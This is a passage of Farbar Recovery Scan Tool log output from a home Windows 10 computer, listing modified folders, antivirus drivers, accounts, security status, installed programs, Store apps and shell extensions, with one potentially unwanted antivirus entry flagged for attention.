2020-04-08 08:54 - 2016-07-30 11:49 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Spotify
2020-04-08 06:18 - 2016-07-30 11:48 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\Spotify
2020-04-03 15:32 - 2017-12-15 11:51 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Packages
2020-04-02 21:37 - 2018-12-12 11:55 - 000000000 ____D C:\Users\JLO Squared\Desktop\Jessica's Files
2020-04-02 21:30 - 2020-03-10 09:45 - 000000000 ____D C:\Users\JLO Squared\Desktop\Parachutes - Personal Archive
2020-04-02 20:26 - 2015-06-17 18:29 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2020-04-02 20:26 - 2015-06-17 18:29 - 000000000 ____D C:\Program Files (x86)\WildTangent Games
2020-04-02 20:25 - 2019-09-19 14:00 - 000000000 ____D C:\Users\JLO Squared\AppData\Roaming\WildTangent
2020-04-02 20:25 - 2015-06-17 18:29 - 000000000 ____D C:\ProgramData\WildTangent
2020-04-02 20:21 - 2019-04-03 15:46 - 000000000 ____D C:\Program Files (x86)\Wondershare
2020-04-02 16:21 - 2020-03-03 17:13 - 000317864 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-04-02 16:21 - 2020-03-03 17:13 - 000110064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-04-02 16:21 - 2020-03-03 17:13 - 000085664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000852392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000206672 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000043568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-04-02 16:20 - 2020-03-03 17:13 - 000037960 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000234840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000179032 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-04-02 16:19 - 2020-03-03 17:13 - 000061272 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-04-02 16:16 - 2020-03-22 15:28 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\Dropbox
2020-04-02 16:09 - 2017-01-28 21:38 - 000000000 ____D C:\Program Files\Common Files\Apple
2020-04-02 16:08 - 2017-01-28 21:39 - 000002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2020-04-02 16:02 - 2016-10-31 09:38 - 000000000 ___RD C:\Users\JLO Squared\Desktop\Scanned Documents
2020-04-02 15:57 - 2018-12-12 11:55 - 000000000 ____D C:\Users\JLO Squared\Desktop\Picture Files
2020-04-02 15:55 - 2020-03-03 17:12 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\WinZip
2020-04-02 13:39 - 2020-03-21 12:22 - 000000000 ____D C:\Users\JLO Squared\Documents\CyberLink

==================== Files in the root of some directories ========

2016-10-20 10:29 - 2017-03-05 17:21 - 000043580 _____ () C:\Users\JLO Squared\AppData\Local\digikamrc
2016-10-20 20:38 - 2016-10-22 07:48 - 000000024 _____ () C:\Users\JLO Squared\AppData\Local\digikam_tagsmanagerrc
2016-10-20 19:28 - 2016-10-20 19:28 - 000000050 _____ () C:\Users\JLO Squared\AppData\Local\kdeglobals
2016-10-20 10:31 - 2016-10-20 11:44 - 000002020 _____ () C:\Users\JLO Squared\AppData\Local\showfotorc

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2020
Ran by JLO Squared (29-04-2020 12:17:24)
Running from C:\Users\JLO Squared\Desktop\New folder
Windows 10 Home Version 1903 18362.778 (X64) (2019-08-22 06:15:52)
Boot Mode: Safe Mode (with Networking)
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3444092895-3226993445-944412456-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3444092895-3226993445-944412456-503 - Limited - Disabled)
Guest (S-1-5-21-3444092895-3226993445-944412456-501 - Limited - Disabled)
JLO Squared (S-1-5-21-3444092895-3226993445-944412456-1001 - Administrator - Enabled) => C:\Users\JLO Squared
WDAGUtilityAccount (S-1-5-21-3444092895-3226993445-944412456-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {18A975F9-A60C-37D8-E30B-4BEF31AD3411}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 19.00 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1900-000001000000}) (Version: 19.00.00.0 - Igor Pavlov)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 20.006.20042 - Adobe Systems Incorporated)
Affinity Photo (HKLM\...\{08F71220-F1A7-405D-8FB8-829E608BC52A}) (Version: 1.5.0.45 - Serif (Europe) Ltd)
Apple Application Support (32-bit) (HKLM-x32\...\{A7039CC9-4669-4799-92B1-C5CE346DBE3D}) (Version: 8.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{7EAC8A42-9FAC-4F6B-AABF-C08C9F2E0F13}) (Version: 5.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6E93B248-22B6-48B2-A568-2E49C65B2EA4}) (Version: 13.5.0.20 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
AVG AntiVirus FREE (HKLM-x32\...\AVG Antivirus) (Version: 20.2.3116 - AVG Technologies)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BookWright version 1.1.130 (HKLM-x32\...\{C17978EB-5A2C-40E3-B351-F03A27245BF9}_is1) (Version: 1.1.130 - Blurb, Inc.)
Chromium (HKLM-x32\...\{C85A209A-98DA-F11A-295A-819AF9DA521A}) (Version: - )
Chromium (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Chromium) (Version: 63.0.3235.0 - Chromium)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.9.5017 - CyberLink Corp.)
Cyberlink PhotoDirector (HKLM\...\{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.4.6121 - CyberLink Corp.) Hidden
Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.4.6121 - CyberLink Corp.)
CyberLink Power Media Player 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.6.4928 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.9.5103 - CyberLink Corp.)
CyberLink PowerBackup 2.6 (HKLM-x32\...\InstallShield_{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.6.2.1307 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM\...\{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.3.3812 - CyberLink Corp.) Hidden
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.3.3812 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 95.4.441 - Dropbox, Inc.)
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.3.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.295.1 - Dropbox, Inc.) Hidden
Evernote v. 6.24.2 (HKLM-x32\...\{A8B80634-6257-11EA-8C8E-005056951CAD}) (Version: 6.24.2.8919 - Evernote Corp.)
Foxit PhantomPDF (HKLM-x32\...\{4E32271C-B55A-4CDF-8DB7-88FD1C45927C}) (Version: 7.0.310.226 - Foxit Software Inc.)
GnuWin32: Make-3.81 (HKLM-x32\...\Make-3.81_is1) (Version: 3.81 - GnuWin32)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 81.0.4044.122 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.99.0 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (HKLM-x32\...\{6F340107-F9AA-47C6-B54C-C3A19F11553F}) (Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{4BF17F05-B2DA-4266-8AEB-09BC9D008EAF}) (Version: 1.3.0.0 - Hewlett-Packard)
HP Dropbox Plugin (HKLM-x32\...\{D12BC084-97D6-438A-AA7C-5962608D17A0}) (Version: 36.0.41.58587 - HP)
HP ENVY 7640 series Basic Device Software (HKLM\...\{B81E425D-39FF-4846-B4BB-7AD61909A0EF}) (Version: 40.11.1135.17143 - HP Inc.)
HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard)
HP ESU for Microsoft Windows 8.1 (HKLM-x32\...\{CF3BE446-3D26-49D3-B202-C9A13511DEEC}) (Version: 1.6.1 - Hewlett-Packard Company)
HP Google Drive Plugin (HKLM-x32\...\{BFA42100-DB54-467A-BB87-CF70732B4065}) (Version: 36.0.41.58587 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7960.5089 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.39 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.8.24.33 - HP)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.15.14.3 - HP)
HP Touchpoint Analytics Client (HKLM\...\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}) (Version: 4.0.2.1439 - HP Inc.)
Hugin (HKLM\...\{C64F9956-580A-4D11-AFA0-C567B2A17B7B}) (Version: 16.2.0.0 - Hugin developer team)
Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.39 - Softex Inc.) Hidden
Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.39 - Softex Inc.) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{fb610cea-ba50-4d4b-a717-cf025419035c}) (Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1173 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.5058 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{7224B7CE-196C-4E2A-A1AE-1D7BF259FD36}) (Version: 3.4.1942 - Intel Corporation)
Intel® WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{915DDCDE-7767-4B4A-9256-8729B265BDAC}) (Version: 17.1.1440.02 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{f8c930bd-0a68-425f-8c11-87723d1e2c97}) (Version: 20.90.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{D75FB6A7-8D3C-4159-AE6D-42E1820E1B68}) (Version: 12.10.5.12 - Apple Inc.)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Levels 1, 2 & 3 Download 5-User Edition (HKLM-x32\...\{F469F826-0F89-4488-BC78-57511A90DC77}) (Version: 1.1.21 - TOPICS Entertainment)
Malwarebytes Anti-Malware version 1.70.0.1100 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.70.0.1100 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4641.1005 - Microsoft Corporation)
Microsoft Office Standard 2016 (HKLM\...\Office16.STANDARD) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Teams) (Version: 1.3.00.8663 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Product Improvement Study for HP ENVY 7640 series (HKLM\...\{C15C2D78-89D2-4EC1-850D-4D9BFADA758A}) (Version: 40.11.1135.17143 - HP Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
SAntivirus Realtime Protection Lite (HKLM-x32\...\SAntivirus) (Version: 1.0.21.32 - Digital Com. Inc) <==== ATTENTION
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.9.2.0 - Seagate)
Search Powered by Yahoo! (HKLM-x32\...\{2E10C6D0-7E90-1750-CF10-67D01F90B450}) (Version: - )
Spotify (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Spotify) (Version: 1.1.29.592.gf0779179 - Spotify AB)
Unchecky v1.2 (HKLM-x32\...\Unchecky) (Version: 1.2 - Reason Software Company Inc.)
Update for Skype for Business 2016 (KB4484286) 64-Bit Edition (HKLM\...\{90160000-0012-0000-1000-0000000FF1CE}_Office16.STANDARD_{5F64605A-1F38-44BE-BB99-1799A6D11A62}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4484286) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.STANDARD_{5F64605A-1F38-44BE-BB99-1799A6D11A62}) (Version: - Microsoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Helper Compact 2.5.3 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.3 - Wondershare)

Packages:
=========
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2019-11-05] (Autodesk Inc.)
Getting Started with Windows 8 -> C:\Program Files\WindowsApps\AD2F1837.GettingStartedwithWindows8_1.6.0.0_neutral__v10z8vjag6ke6 [2016-05-14] (Hewlett-Packard Company)
Hearts Deluxe -> C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.HeartsDeluxe_6.6.26.0_x64__kx24dqmazqk8j [2020-01-26] (Random Salad Games LLC) [MS Ad]
HP Connected Drive -> C:\Program Files\WindowsApps\AD2F1837.HPFileViewer_4.4.32.190_x64__v10z8vjag6ke6 [2016-05-14] (HP Inc.)
HP Registration -> C:\Program Files\WindowsApps\AD2F1837.HPRegistration_1.2.1.166_neutral__v10z8vjag6ke6 [2015-06-17] (Hewlett-Packard Company)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_110.1.728.0_x64__v10z8vjag6ke6 [2020-04-14] (HP Inc.)
McAfee® Central for HP -> C:\Program Files\WindowsApps\2703103D.McAfeeCentral_5.0.177.1_x64__4ehj4w4frejdr [2018-04-03] (.-McAfee Inc-.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-15] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.9.12130.0_x64__8wekyb3d8bbwe [2019-12-19] (Microsoft Studios) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.4030.0_x64__8wekyb3d8bbwe [2020-04-16] (Microsoft Studios) [MS Ad]
MSN Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
MSN Travel -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
mysms - Text from Computer, Messaging -> C:\Program Files\WindowsApps\UptoElevenDigitalSolution.mysms-Textanywhere_3.2.0.0_x64__c9d6r4qvva5x8 [2019-02-01] (Up to Eleven Digital Solutions GmbH)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.96.725.0_x64__mcm4njqhnhss8 [2020-04-12] (Netflix, Inc.)
NOOK – Books, Magazines, Newspapers, Comics -> C:\Program Files\WindowsApps\BarnesNoble.Nook_1.10.1.15_x86__ahnzqzva31enc [2018-06-18] (Barnes &amp; Noble)
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-12-15] (Microsoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation)
Simple Solitaire -> C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.SimpleSolitaire_6.18.78.0_x64__kx24dqmazqk8j [2020-03-03] (Random Salad Games LLC) [MS Ad]
The Weather Channel for HP -> C:\Program Files\WindowsApps\Weather.TheWeatherChannelforHP_2015.1108.1.0_x64__t3yemqpq4kp7p [2016-05-14] (The Weather Channel.)
Translator -> C:\Program Files\WindowsApps\Microsoft.BingTranslator_5.6.0.0_x64__8wekyb3d8bbwe [2019-08-17] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3444092895-3226993445-944412456-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\JLO Squared\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3444092895-3226993445-944412456-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\JLO Squared\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
